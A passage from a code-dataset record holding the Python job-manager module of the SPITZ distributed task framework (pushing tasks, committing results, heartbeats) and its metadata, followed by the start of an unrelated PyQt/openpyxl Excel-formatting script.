Because this is a connection event,\n        # make it a debug rather than a warning\n        logging.debug('Error connecting to task manager at %s:%d!',\n            e.address, e.port)\n        log_lines(traceback.format_exc(), logging.debug)\n        e.Close()\n        return False\n    try:\n        # Send the job identifier\n        e.WriteString(jm_jobid)\n\n        # Ask if it is possible to send tasks\n        e.WriteInt64(messaging.msg_send_task)\n\n        # Verify job id of the answer\n        jobid = e.ReadString(jm_recv_timeout)\n\n        if jm_jobid != jobid:\n            logging.error('Job Id mismatch from %s:%d! Self: %s, task manager: %s!',\n                e.address, e.port, jm_jobid, jobid)\n            e.Close()\n            return False\n\n        # Wait for a response\n        response = e.ReadInt64(jm_recv_timeout)\n\n        if response == messaging.msg_send_full:\n            # Task manager is full\n            logging.debug('Task manager at %s:%d is full.',\n                e.address, e.port)\n\n        elif response == messaging.msg_send_more:\n            # Continue to the task pushing loop\n            return True\n\n        else:\n            # The task manager is not replying as expected\n            logging.error('Unknown response from the task manager!')\n\n    except:\n        # Problem connecting to the task manager\n        logging.warning('Error connecting to task manager at %s:%d!',\n            e.address, e.port)\n        log_lines(traceback.format_exc(), logging.debug)\n\n    e.Close()\n    return False\n\n###############################################################################\n# Exchange messages with an endpoint to begin reading results\n###############################################################################\ndef setup_endpoint_for_pulling(e):\n    try:\n        # Try to connect to a task manager\n        e.Open(jm_conn_timeout)\n    except:\n        # Problem connecting to the task manager\n        # Because this is a connection event,\n        # make it a debug rather than a warning\n        logging.debug('Error connecting to task manager at %s:%d!',\n            e.address, e.port)\n        log_lines(traceback.format_exc(), logging.debug)\n        e.Close()\n        return False\n    try:\n        # Send the job identifier\n        e.WriteString(jm_jobid)\n\n        # Ask if it is possible to read results\n        e.WriteInt64(messaging.msg_read_result)\n\n        # Verify job id of the answer\n        jobid = e.ReadString(jm_recv_timeout)\n\n        if jm_jobid != jobid:\n            logging.error('Job Id mismatch from %s:%d! 
Self: %s, task manager: %s!',\n e.address, e.port, jm_jobid, jobid)\n e.Close()\n return False\n\n return True\n\n except:\n # Problem connecting to the task manager\n logging.warning('Error connecting to task manager at %s:%d!',\n e.address, e.port)\n log_lines(traceback.format_exc(), logging.debug)\n\n e.Close()\n return False\n\n###############################################################################\n# Push tasks while the task manager is not full\n###############################################################################\ndef push_tasks(job, runid, jm, tm, taskid, task, tasklist, completed):\n # Keep pushing until finished or the task manager is full\n sent = []\n while True:\n if task == None:\n\n # Avoid calling next_task after it's finished\n if completed:\n logging.debug('There are no new tasks to generate.')\n return (True, 0, None, sent)\n\n # Only get a task if the last one was already sent\n newtaskid = taskid + 1\n r1, newtask, ctx = job.spits_job_manager_next_task(jm, newtaskid)\n\n # Exit if done\n if r1 == 0:\n return (True, 0, None, sent)\n\n if newtask == None:\n logging.error('Task %d was not pushed!', newtaskid)\n return (False, taskid, task, sent)\n\n if ctx != newtaskid:\n logging.error('Context verification failed for task %d!',\n newtaskid)\n return (False, taskid, task, sent)\n\n # Add the generated task to the tasklist\n taskid = newtaskid\n task = newtask[0]\n tasklist[taskid] = (0, task)\n\n logging.debug('Generated task %d with payload size of %d bytes.',\n taskid, len(task) if task != None else 0)\n\n try:\n logging.debug('Pushing %d...', taskid)\n\n # Push the task to the active task manager\n tm.WriteInt64(taskid)\n tm.WriteInt64(runid)\n if task == None:\n tm.WriteInt64(0)\n else:\n tm.WriteInt64(len(task))\n tm.Write(task)\n\n # Wait for a response\n response = tm.ReadInt64(jm_recv_timeout)\n\n if response == messaging.msg_send_full:\n # Task was sent, but the task manager is now full\n sent.append((taskid, task))\n task = None\n break\n\n elif response == messaging.msg_send_more:\n # Continue pushing tasks\n sent.append((taskid, task))\n task = None\n pass\n\n elif response == messaging.msg_send_rjct:\n # Task was rejected by the task manager, this is not\n # predicted for a model where just one task manager\n # pushes tasks, exit the task loop\n logging.warning('Task manager at %s:%d rejected task %d',\n tm.address, tm.port, taskid)\n break\n\n else:\n # The task manager is not replying as expected\n logging.error('Unknown response from the task manager!')\n break\n except:\n # Something went wrong with the connection,\n # try with another task manager\n logging.error('Error pushing tasks to task manager!')\n log_lines(traceback.format_exc(), logging.debug)\n break\n\n return (False, taskid, task, sent)\n\n###############################################################################\n# Read and commit tasks while the task manager is not empty\n###############################################################################\ndef commit_tasks(job, runid, co, tm, tasklist, completed):\n # Keep pulling until finished or the task manager is full\n n_errors = 0\n while True:\n try:\n # Pull the task from the active task manager\n taskid = tm.ReadInt64(jm_recv_timeout)\n\n if taskid == messaging.msg_read_empty:\n # No more task to receive\n return\n\n # Read the run id\n taskrunid = tm.ReadInt64(jm_recv_timeout)\n\n # Read the rest of the task\n r = tm.ReadInt64(jm_recv_timeout)\n ressz = tm.ReadInt64(jm_recv_timeout)\n res = tm.Read(ressz, 
jm_recv_timeout)\n\n            # Tell the task manager that the task was received\n            tm.WriteInt64(messaging.msg_read_result)\n\n            # Warning, exceptions after this line may cause task loss\n            # if not handled properly!!\n\n            if r != 0:\n                n_errors += 1\n                if r == messaging.res_module_error:\n                    logging.error('The remote worker crashed while ' +\n                        'executing task %d!', taskid)\n                else:\n                    logging.error('The task %d was not successfully executed, ' +\n                        'worker returned %d!', taskid, r)\n\n            if taskrunid < runid:\n                logging.debug('The task %d is from the previous run %d ' +\n                    'and will be ignored!', taskid, taskrunid)\n                continue\n\n            if taskrunid > runid:\n                logging.error('Received task %d from a future run %d!',\n                    taskid, taskrunid)\n                continue\n\n            # Validate the completed task\n\n            c = completed.get(taskid, (None, None))\n            if c[0] != None:\n                # This may happen with the fault tolerance system. This may\n                # lead to tasks being put in the tasklist by the job manager\n                # while being committed. The tasklist must be constantly\n                # sanitized.\n                logging.warning('The task %d was received more than once ' +\n                    'and will not be committed again!',\n                    taskid)\n                # Remove the completed task from the tasklist\n                tasklist.pop(taskid, (None, None))\n                continue\n\n            # Remove it from the tasklist\n\n            p = tasklist.pop(taskid, (None, None))\n            if p[0] == None and c[0] == None:\n                # The task was not already completed and was not scheduled\n                # to be executed, this is a serious problem!\n                logging.error('The task %d was not in the working list!',\n                    taskid)\n\n            r2 = job.spits_committer_commit_pit(co, res)\n\n            if r2 != 0:\n                logging.error('The task %d was not successfully committed, ' +\n                    'committer returned %d', taskid, r2)\n\n            # Add completed task to list\n            completed[taskid] = (r, r2)\n\n        except:\n            # Something went wrong with the connection,\n            # try with another task manager\n            break\n    if n_errors > 0:\n        logging.warning('There were %d failed tasks', n_errors)\n\n\ndef infinite_tmlist_generator():\n    ''' Iterates over TMs returned by the load_tm_list() method indefinitely.\n    The result of a single iteration is a tuple containing (Finished, Name,\n    TM), where Finished == True indicates if the currently listed TMs\n    finished. The next iteration will read the TMs again, setting Finished to\n    False.\n\n    Conditions:\n        Finished == True <=> (Name, TM) == (None, None)\n        Finished == False <=> (Name, TM) != (None, None)\n\n    Example:\n        for isEnd, name, tm in infinite_tmlist_generator():\n            if not isEnd:\n                do something with the task manager (name, tm)\n            else:\n                all tms were processed, you can do post processing here. 
The\n next iteration will set isEnd to True and start over again'''\n tmlist = load_tm_list()\n while True:\n try:\n newtmlist = load_tm_list()\n if len(newtmlist) > 0:\n tmlist = newtmlist\n elif len(tmlist) > 0:\n logging.warning('New list of task managers is ' +\n 'empty and will not be updated!')\n except:\n # Reloading failed; keep using the previous list\n logging.warning('Failed reloading the task manager ' +\n 'list, keeping the previous one!')\n for name, tm in tmlist.items():\n yield False, name, tm\n yield True, None, None\n\n\n###############################################################################\n# Heartbeat routine\n###############################################################################\ndef heartbeat(finished):\n global jm_heartbeat_interval\n t_last = time.monotonic()\n for isEnd, name, tm in infinite_tmlist_generator():\n if finished[0]:\n logging.debug('Stopping heartbeat thread...')\n return\n if isEnd:\n t_curr = time.monotonic()\n elapsed = t_curr - t_last\n t_last = t_curr\n sleep_for = max(jm_heartbeat_interval - elapsed, 0)\n time.sleep(sleep_for)\n else:\n try:\n tm.Open(jm_heart_timeout)\n except:\n # Problem connecting to the task manager\n # Because this is a connection event,\n # make it a debug rather than a warning\n logging.debug('Error connecting to task manager at %s:%d!',\n tm.address, tm.port)\n log_lines(traceback.format_exc(), logging.debug)\n tm.Close()\n continue\n try:\n # Send the job identifier\n tm.WriteString(jm_jobid)\n\n # Verify job id of the answer\n jobid = tm.ReadString(jm_recv_timeout)\n\n if jm_jobid != jobid:\n logging.error('Job Id mismatch from %s:%d! Self: %s, task manager: %s!',\n tm.address, tm.port, jm_jobid, jobid)\n tm.Close()\n continue\n\n # Send the heartbeat\n tm.WriteInt64(messaging.msg_send_heart)\n except:\n logging.warning('Error sending heartbeat to task manager at %s:%d!',\n tm.address, tm.port)\n log_lines(traceback.format_exc(), logging.debug)\n finally:\n tm.Close()\n\n\n###############################################################################\n# Job Manager routine\n###############################################################################\ndef jobmanager(argv, job, runid, jm, tasklist, completed):\n logging.info('Job manager running...')\n memstat.stats()\n\n # Load the list of nodes to connect to\n tmlist = load_tm_list()\n\n # Store some metadata\n submissions = [] # (taskid, submission time, [sent to])\n\n # Task generation loop\n\n taskid = 0\n task = None\n finished = False\n\n while True:\n # Reload the list of task managers at each\n # run so new tms can be added on the fly\n try:\n newtmlist = load_tm_list()\n if len(newtmlist) > 0:\n tmlist = newtmlist\n elif len(tmlist) > 0:\n logging.warning('New list of task managers is ' +\n 'empty and will not be updated!')\n except:\n logging.error('Failed parsing task manager list!')\n\n for name, tm in tmlist.items():\n logging.debug('Connecting to %s:%d...', tm.address, tm.port)\n\n # Open the connection to the task manager and query if it is\n # possible to send data\n if not setup_endpoint_for_pushing(tm):\n finished = False\n else:\n logging.debug('Pushing tasks to %s:%d...', tm.address, tm.port)\n\n # Task pushing loop\n memstat.stats()\n finished, taskid, task, sent = push_tasks(job, runid, jm,\n tm, taskid, task, tasklist, completed[0] == 1)\n\n # Add the sent tasks to the submission list\n submissions = submissions + sent\n\n # Close the connection with the task manager\n tm.Close()\n\n logging.debug('Finished pushing tasks to %s:%d.',\n tm.address, tm.port)
\n\n if finished and completed[0] == 0:\n # Tell everyone the task generation was completed\n logging.info('All tasks generated.')\n completed[0] = 1\n\n # Exit the job manager when done\n if len(tasklist) == 0 and completed[0] == 1:\n logging.debug('Job manager exiting...')\n return\n\n # Keep sending the uncommitted tasks\n # TODO: WARNING this will flood the system\n # with repeated tasks\n if finished and len(tasklist) > 0:\n if len(submissions) == 0:\n logging.critical('The submission list is empty but '\n 'the task list is not! Some tasks were lost!')\n\n # Select the oldest task that is not already completed\n while True:\n taskid, task = submissions.pop(0)\n if taskid in tasklist:\n break\n\n # Remove the committed tasks from the submission list\n submissions = [x for x in submissions if x[0] in tasklist]\n\n time.sleep(jm_send_backoff)\n\n###############################################################################\n# Committer routine\n###############################################################################\ndef committer(argv, job, runid, co, tasklist, completed):\n logging.info('Committer running...')\n memstat.stats()\n\n # Load the list of nodes to connect to\n tmlist = load_tm_list()\n\n # Result pulling loop\n while True:\n # Reload the list of task managers at each\n # run so new tms can be added on the fly\n try:\n newtmlist = load_tm_list()\n if len(newtmlist) > 0:\n tmlist = newtmlist\n elif len(tmlist) > 0:\n logging.warning('New list of task managers is ' +\n 'empty and will not be updated!')\n except:\n logging.error('Failed parsing task manager list!')\n\n for name, tm in tmlist.items():\n logging.debug('Connecting to %s:%d...', tm.address, tm.port)\n\n # Open the connection to the task manager and query if it is\n # possible to send data\n if not setup_endpoint_for_pulling(tm):\n continue\n\n logging.debug('Pulling tasks from %s:%d...', tm.address, tm.port)\n\n # Task pulling loop\n commit_tasks(job, runid, co, tm, tasklist, completed)\n memstat.stats()\n\n # Close the connection with the task manager\n tm.Close()\n\n logging.debug('Finished pulling tasks from %s:%d.',\n tm.address, tm.port)\n\n if len(tasklist) == 0 and completed[0] == 1:\n logging.info('All tasks committed.')\n logging.debug('Committer exiting...')\n return\n\n # Refresh the tasklist\n for taskid in completed:\n tasklist.pop(taskid, 0)\n\n time.sleep(jm_recv_backoff)\n\n###############################################################################\n# Kill all task managers\n###############################################################################\ndef killtms():\n logging.info('Killing task managers...')\n\n # Load the list of nodes to connect to\n tmlist = load_tm_list()\n\n for name, tm in tmlist.items():\n try:\n logging.debug('Connecting to %s:%d...', tm.address, tm.port)\n\n tm.Open(jm_conn_timeout)\n\n # Send the job identifier\n tm.WriteString(jm_jobid)\n\n # Read back the job id of the answer\n tm.ReadString(jm_recv_timeout)\n\n tm.WriteInt64(messaging.msg_terminate)\n tm.Close()\n except:\n # Problem connecting to the task manager\n logging.warning('Error connecting to task manager at %s:%d!',\n tm.address, tm.port)\n log_lines(traceback.format_exc(), logging.debug)\n\n###############################################################################\n# Run routine\n###############################################################################\ndef run(argv, jobinfo, job, runid):\n # List of pending tasks\n memstat.stats()\n tasklist = {}\n\n # Keep an extra list of completed tasks\n completed 
= {0: 0}\n\n # Start the job manager\n logging.info('Starting job manager for job %d...', runid)\n\n # Create the job manager from the job module\n jm = job.spits_job_manager_new(argv, jobinfo)\n\n jmthread = threading.Thread(target=jobmanager,\n args=(argv, job, runid, jm, tasklist, completed))\n jmthread.start()\n\n # Start the committer\n logging.info('Starting committer for job %d...', runid)\n\n # Create the committer from the job module\n co = job.spits_committer_new(argv, jobinfo)\n\n cothread = threading.Thread(target=committer,\n args=(argv, job, runid, co, tasklist, completed))\n cothread.start()\n\n # Wait for both threads\n jmthread.join()\n cothread.join()\n\n # Commit the job\n logging.info('Committing Job...')\n r, res, ctx = job.spits_committer_commit_job(co, 0x12345678)\n logging.debug('Job committed.')\n\n # Finalize the job manager\n logging.debug('Finalizing Job Manager...')\n job.spits_job_manager_finalize(jm)\n\n # Finalize the committer\n logging.debug('Finalizing Committer...')\n job.spits_committer_finalize(co)\n memstat.stats()\n\n if res is None:\n logging.error('Job did not push any result!')\n return messaging.res_module_noans, None\n\n if ctx != 0x12345678:\n logging.error('Context verification failed for job!')\n return messaging.res_module_ctxer, None\n\n logging.debug('Job %d finished successfully.', runid)\n return r, res[0]\n\n###############################################################################\n# Main routine\n###############################################################################\ndef main(argv):\n # Print usage\n if len(argv) <= 1:\n abort('USAGE: jm module [module args]')\n\n # Parse the arguments\n args = Args.Args(argv[1:])\n parse_global_config(args.args)\n\n # Setup logging\n setup_log()\n logging.debug('Hello!')\n\n # Enable memory debugging\n if jm_memstat == 1:\n memstat.enable()\n memstat.stats()\n\n # Enable perf module\n if jm_profiling:\n PerfModule(make_uid(), 0, jm_perf_rinterv, jm_perf_subsamp)\n\n # Load the module\n module = args.margs[0]\n job = JobBinary(module)\n\n # Remove JM arguments when passing to the module\n margv = args.margs\n\n # Keep a run identifier\n runid = [0]\n\n # Wrapper to include job module\n def run_wrapper(argv, jobinfo):\n runid[0] = runid[0] + 1\n return run(argv, jobinfo, job, runid[0])\n\n # Wrapper for the heartbeat\n finished = [False]\n def heartbeat_wrapper():\n heartbeat(finished)\n\n # Start the heartbeat\n threading.Thread(target=heartbeat_wrapper).start()\n\n # Run the module\n logging.info('Running module')\n memstat.stats()\n r = job.spits_main(margv, run_wrapper)\n memstat.stats()\n\n # Stop the heartbeat thread\n finished[0] = True\n\n # Kill the workers\n if jm_killtms:\n killtms()\n\n # Print final memory report\n memstat.stats()\n\n # Finalize\n logging.debug('Bye!')\n #exit(r)\n\n###############################################################################\n# Entry point\n###############################################################################\nif __name__ == '__main__':\n main(sys.argv)\n", "sub_path": "spitz-python/jm.py", "file_name": "jm.py", "file_ext": "py", "file_size_in_byte": 31433, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "logging.INFO", "line_number": 79, "usage_type": "attribute"}, {"api_name": "libspitz.config.heart_timeout", "line_number": 80, "usage_type": "attribute"}, {"api_name": "libspitz.config", "line_number": 80, "usage_type": "name"}, {"api_name": 
"libspitz.config.conn_timeout", "line_number": 81, "usage_type": "attribute"}, {"api_name": "libspitz.config", "line_number": 81, "usage_type": "name"}, {"api_name": "libspitz.config.recv_timeout", "line_number": 82, "usage_type": "attribute"}, {"api_name": "libspitz.config", "line_number": 82, "usage_type": "name"}, {"api_name": "libspitz.config.send_timeout", "line_number": 83, "usage_type": "attribute"}, {"api_name": "libspitz.config", "line_number": 83, "usage_type": "name"}, {"api_name": "libspitz.config.recv_backoff", "line_number": 84, "usage_type": "attribute"}, {"api_name": "libspitz.config", "line_number": 84, "usage_type": "name"}, {"api_name": "libspitz.config.send_backoff", "line_number": 85, "usage_type": "attribute"}, {"api_name": "libspitz.config", "line_number": 85, "usage_type": "name"}, {"api_name": "logging.getLogger", "line_number": 97, "usage_type": "call"}, {"api_name": "logging.StreamHandler", "line_number": 101, "usage_type": "call"}, {"api_name": "sys.stderr", "line_number": 101, "usage_type": "attribute"}, {"api_name": "logging.StreamHandler", "line_number": 103, "usage_type": "call"}, {"api_name": "logging.DEBUG", "line_number": 104, "usage_type": "attribute"}, {"api_name": "logging.Formatter", "line_number": 105, "usage_type": "call"}, {"api_name": "logging.critical", "line_number": 114, "usage_type": "call"}, {"api_name": "logging.debug", "line_number": 126, "usage_type": "call"}, {"api_name": "logging.debug", "line_number": 145, "usage_type": "call"}, {"api_name": "libspitz.SimpleEndpoint", "line_number": 154, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 166, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 180, "usage_type": "call"}, {"api_name": "os.path", "line_number": 180, "usage_type": "attribute"}, {"api_name": "logging.debug", "line_number": 182, "usage_type": "call"}, {"api_name": "logging.warning", "line_number": 189, "usage_type": "call"}, {"api_name": "logging.debug", "line_number": 215, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 221, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 222, "usage_type": "call"}, {"api_name": "os.path", "line_number": 222, "usage_type": "attribute"}, {"api_name": "os.path.isfile", "line_number": 223, "usage_type": "call"}, {"api_name": "os.path", "line_number": 223, "usage_type": "attribute"}, {"api_name": "logging.warning", "line_number": 227, "usage_type": "call"}, {"api_name": "logging.debug", "line_number": 239, "usage_type": "call"}, {"api_name": "logging.debug", "line_number": 253, "usage_type": "call"}, {"api_name": "libspitz.log_lines", "line_number": 255, "usage_type": "call"}, {"api_name": "traceback.format_exc", "line_number": 255, "usage_type": "call"}, {"api_name": "logging.debug", "line_number": 255, "usage_type": "attribute"}, {"api_name": "libspitz.messaging.msg_send_task", "line_number": 263, "usage_type": "attribute"}, {"api_name": "libspitz.messaging", "line_number": 263, "usage_type": "name"}, {"api_name": "logging.error", "line_number": 269, "usage_type": "call"}, {"api_name": "libspitz.messaging.msg_send_full", "line_number": 277, "usage_type": "attribute"}, {"api_name": "libspitz.messaging", "line_number": 277, "usage_type": "name"}, {"api_name": "logging.debug", "line_number": 279, "usage_type": "call"}, {"api_name": "libspitz.messaging.msg_send_more", "line_number": 282, "usage_type": "attribute"}, {"api_name": "libspitz.messaging", "line_number": 282, "usage_type": "name"}, {"api_name": "logging.error", 
"line_number": 288, "usage_type": "call"}, {"api_name": "logging.warning", "line_number": 292, "usage_type": "call"}, {"api_name": "libspitz.log_lines", "line_number": 294, "usage_type": "call"}, {"api_name": "traceback.format_exc", "line_number": 294, "usage_type": "call"}, {"api_name": "logging.debug", "line_number": 294, "usage_type": "attribute"}, {"api_name": "logging.debug", "line_number": 310, "usage_type": "call"}, {"api_name": "libspitz.log_lines", "line_number": 312, "usage_type": "call"}, {"api_name": "traceback.format_exc", "line_number": 312, "usage_type": "call"}, {"api_name": "logging.debug", "line_number": 312, "usage_type": "attribute"}, {"api_name": "libspitz.messaging.msg_read_result", "line_number": 320, "usage_type": "attribute"}, {"api_name": "libspitz.messaging", "line_number": 320, "usage_type": "name"}, {"api_name": "logging.error", "line_number": 326, "usage_type": "call"}, {"api_name": "logging.warning", "line_number": 335, "usage_type": "call"}, {"api_name": "libspitz.log_lines", "line_number": 337, "usage_type": "call"}, {"api_name": "traceback.format_exc", "line_number": 337, "usage_type": "call"}, {"api_name": "logging.debug", "line_number": 337, "usage_type": "attribute"}, {"api_name": "logging.debug", "line_number": 353, "usage_type": "call"}, {"api_name": "logging.error", "line_number": 365, "usage_type": "call"}, {"api_name": "logging.error", "line_number": 369, "usage_type": "call"}, {"api_name": "logging.debug", "line_number": 378, "usage_type": "call"}, {"api_name": "logging.debug", "line_number": 382, "usage_type": "call"}, {"api_name": "libspitz.messaging.msg_send_full", "line_number": 396, "usage_type": "attribute"}, {"api_name": "libspitz.messaging", "line_number": 396, "usage_type": "name"}, {"api_name": "libspitz.messaging.msg_send_more", "line_number": 402, "usage_type": "attribute"}, {"api_name": "libspitz.messaging", "line_number": 402, "usage_type": "name"}, {"api_name": "libspitz.messaging.msg_send_rjct", "line_number": 408, "usage_type": "attribute"}, {"api_name": "libspitz.messaging", "line_number": 408, "usage_type": "name"}, {"api_name": "logging.warning", "line_number": 412, "usage_type": "call"}, {"api_name": "logging.error", "line_number": 418, "usage_type": "call"}, {"api_name": "logging.error", "line_number": 423, "usage_type": "call"}, {"api_name": "libspitz.log_lines", "line_number": 424, "usage_type": "call"}, {"api_name": "traceback.format_exc", "line_number": 424, "usage_type": "call"}, {"api_name": "logging.debug", "line_number": 424, "usage_type": "attribute"}, {"api_name": "libspitz.messaging.msg_read_empty", "line_number": 440, "usage_type": "attribute"}, {"api_name": "libspitz.messaging", "line_number": 440, "usage_type": "name"}, {"api_name": "libspitz.messaging.msg_read_result", "line_number": 453, "usage_type": "attribute"}, {"api_name": "libspitz.messaging", "line_number": 453, "usage_type": "name"}, {"api_name": "libspitz.messaging.res_module_error", "line_number": 460, "usage_type": "attribute"}, {"api_name": "libspitz.messaging", "line_number": 460, "usage_type": "name"}, {"api_name": "logging.error", "line_number": 461, "usage_type": "call"}, {"api_name": "logging.error", "line_number": 464, "usage_type": "call"}, {"api_name": "logging.debug", "line_number": 468, "usage_type": "call"}, {"api_name": "logging.error", "line_number": 473, "usage_type": "call"}, {"api_name": "logging.warning", "line_number": 485, "usage_type": "call"}, {"api_name": "logging.error", "line_number": 498, "usage_type": "call"}, {"api_name": 
"logging.error", "line_number": 504, "usage_type": "call"}, {"api_name": "logging.warn", "line_number": 515, "usage_type": "call"}, {"api_name": "logging.warning", "line_number": 543, "usage_type": "call"}, {"api_name": "logging.warning", "line_number": 547, "usage_type": "call"}, {"api_name": "time.clock", "line_number": 559, "usage_type": "call"}, {"api_name": "logging.debug", "line_number": 562, "usage_type": "call"}, {"api_name": "time.clock", "line_number": 565, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 569, "usage_type": "call"}, {"api_name": "logging.debug", "line_number": 577, "usage_type": "call"}, {"api_name": "libspitz.log_lines", "line_number": 579, "usage_type": "call"}, {"api_name": "traceback.format_exc", "line_number": 579, "usage_type": "call"}, {"api_name": "logging.debug", "line_number": 579, "usage_type": "attribute"}, {"api_name": "logging.error", "line_number": 590, "usage_type": "call"}, {"api_name": "libspitz.messaging.msg_send_heart", "line_number": 596, "usage_type": "attribute"}, {"api_name": "libspitz.messaging", "line_number": 596, "usage_type": "name"}, {"api_name": "logging.warning", "line_number": 598, "usage_type": "call"}, {"api_name": "libspitz.log_lines", "line_number": 600, "usage_type": "call"}, {"api_name": "traceback.format_exc", "line_number": 600, "usage_type": "call"}, {"api_name": "logging.debug", "line_number": 600, "usage_type": "attribute"}, {"api_name": "logging.info", "line_number": 609, "usage_type": "call"}, {"api_name": "libspitz.memstat.stats", "line_number": 610, "usage_type": "call"}, {"api_name": "libspitz.memstat", "line_number": 610, "usage_type": "name"}, {"api_name": "logging.warning", "line_number": 632, "usage_type": "call"}, {"api_name": "logging.error", "line_number": 635, "usage_type": "call"}, {"api_name": "logging.debug", "line_number": 638, "usage_type": "call"}, {"api_name": "logging.debug", "line_number": 645, "usage_type": "call"}, {"api_name": "libspitz.memstat.stats", "line_number": 648, "usage_type": "call"}, {"api_name": "libspitz.memstat", "line_number": 648, "usage_type": "name"}, {"api_name": "logging.debug", "line_number": 658, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 663, "usage_type": "call"}, {"api_name": "logging.debug", "line_number": 668, "usage_type": "call"}, {"api_name": "logging.critical", "line_number": 676, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 688, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 694, "usage_type": "call"}, {"api_name": "libspitz.memstat.stats", "line_number": 695, "usage_type": "call"}, {"api_name": "libspitz.memstat", "line_number": 695, "usage_type": "name"}, {"api_name": "logging.warning", "line_number": 709, "usage_type": "call"}, {"api_name": "logging.error", "line_number": 712, "usage_type": "call"}, {"api_name": "logging.debug", "line_number": 715, "usage_type": "call"}, {"api_name": "logging.debug", "line_number": 722, "usage_type": "call"}, {"api_name": "libspitz.memstat.stats", "line_number": 726, "usage_type": "call"}, {"api_name": "libspitz.memstat", "line_number": 726, "usage_type": "name"}, {"api_name": "logging.debug", "line_number": 731, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 735, "usage_type": "call"}, {"api_name": "logging.debug", "line_number": 736, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 743, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 749, "usage_type": "call"}, {"api_name": "logging.debug", 
"line_number": 756, "usage_type": "call"}, {"api_name": "libspitz.messaging.msg_terminate", "line_number": 766, "usage_type": "attribute"}, {"api_name": "libspitz.messaging", "line_number": 766, "usage_type": "name"}, {"api_name": "logging.warning", "line_number": 770, "usage_type": "call"}, {"api_name": "libspitz.log_lines", "line_number": 772, "usage_type": "call"}, {"api_name": "traceback.format_exc", "line_number": 772, "usage_type": "call"}, {"api_name": "logging.debug", "line_number": 772, "usage_type": "attribute"}, {"api_name": "libspitz.memstat.stats", "line_number": 779, "usage_type": "call"}, {"api_name": "libspitz.memstat", "line_number": 779, "usage_type": "name"}, {"api_name": "logging.info", "line_number": 786, "usage_type": "call"}, {"api_name": "threading.Thread", "line_number": 791, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 796, "usage_type": "call"}, {"api_name": "threading.Thread", "line_number": 801, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 810, "usage_type": "call"}, {"api_name": "logging.debug", "line_number": 812, "usage_type": "call"}, {"api_name": "logging.debug", "line_number": 815, "usage_type": "call"}, {"api_name": "logging.debug", "line_number": 819, "usage_type": "call"}, {"api_name": "libspitz.memstat.stats", "line_number": 821, "usage_type": "call"}, {"api_name": "libspitz.memstat", "line_number": 821, "usage_type": "name"}, {"api_name": "logging.error", "line_number": 824, "usage_type": "call"}, {"api_name": "libspitz.messaging.res_module_noans", "line_number": 825, "usage_type": "attribute"}, {"api_name": "libspitz.messaging", "line_number": 825, "usage_type": "name"}, {"api_name": "logging.error", "line_number": 828, "usage_type": "call"}, {"api_name": "libspitz.messaging.res_module_ctxer", "line_number": 829, "usage_type": "attribute"}, {"api_name": "libspitz.messaging", "line_number": 829, "usage_type": "name"}, {"api_name": "logging.debug", "line_number": 831, "usage_type": "call"}, {"api_name": "Args.Args", "line_number": 843, "usage_type": "call"}, {"api_name": "logging.debug", "line_number": 848, "usage_type": "call"}, {"api_name": "libspitz.memstat.enable", "line_number": 852, "usage_type": "call"}, {"api_name": "libspitz.memstat", "line_number": 852, "usage_type": "name"}, {"api_name": "libspitz.memstat.stats", "line_number": 853, "usage_type": "call"}, {"api_name": "libspitz.memstat", "line_number": 853, "usage_type": "name"}, {"api_name": "libspitz.PerfModule", "line_number": 857, "usage_type": "call"}, {"api_name": "libspitz.make_uid", "line_number": 857, "usage_type": "call"}, {"api_name": "libspitz.JobBinary", "line_number": 861, "usage_type": "call"}, {"api_name": "threading.Thread", "line_number": 880, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 883, "usage_type": "call"}, {"api_name": "libspitz.memstat.stats", "line_number": 884, "usage_type": "call"}, {"api_name": "libspitz.memstat", "line_number": 884, "usage_type": "name"}, {"api_name": "libspitz.memstat.stats", "line_number": 886, "usage_type": "call"}, {"api_name": "libspitz.memstat", "line_number": 886, "usage_type": "name"}, {"api_name": "libspitz.memstat.stats", "line_number": 896, "usage_type": "call"}, {"api_name": "libspitz.memstat", "line_number": 896, "usage_type": "name"}, {"api_name": "logging.debug", "line_number": 899, "usage_type": "call"}, {"api_name": "sys.argv", "line_number": 906, "usage_type": "attribute"}]} +{"seq_id": "285717113", "text": "# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thr Oct 
18 14:25:12 2019\n@author: TestEnC hanrim lee\n\n\"\"\"\nimport os\nimport sys\nimport re\nimport openpyxl\n# import pkg_resources.py2_warn\nfrom os.path import expanduser\nimport threading\n\n#from konlpy.tag import Komoran\nfrom time import sleep\nfrom datetime import datetime\n\n#import pytagcloud\nfrom PyQt5.QtCore import QThread, pyqtSignal\n#selenium library\nfrom openpyxl.styles import Alignment, Font, NamedStyle, PatternFill\nfrom openpyxl import formatting, styles, Workbook\nfrom openpyxl.styles.borders import Border, Side\n\nclass Formater(QThread):\n\n print_flag = pyqtSignal(str)\n end_flag = pyqtSignal()\n fileCheck_flag = pyqtSignal()\n progress_flag = pyqtSignal()\n count_flag = pyqtSignal()\n dict_result = None\n tot_count = 0\n\n def __init__(self, filePath, opFlag, modeFlag, parent=None):\n QThread.__init__(self, parent)\n\n self.file_names = filePath\n self.list_files = self.file_names.split(\",\")\n self.list_out_files = []\n self.dict_out = {}\n self.dict_readData = {}\n # self.list_sheet_names = []\n\n self.opFlag = opFlag\n self.modeFlag = modeFlag\n self.home = expanduser(\"~\")\n\n self.end_count = \"n\"\n self.totalRows = 0\n self.currentRow = 0\n self.current_path = os.getcwd()\n self.battery_spec = 0.0\n\n # style fill pattern\n # FF0000 red\n # 0000FF blue\n\n self.brown_fill = PatternFill(start_color='DDD9C4', end_color='DDD9C4', fill_type='solid')\n self.light_brown_fill = PatternFill(start_color='EEECE1', end_color='EEECE1', fill_type='solid')\n self.gray_fill = PatternFill(start_color='E7E6E6', 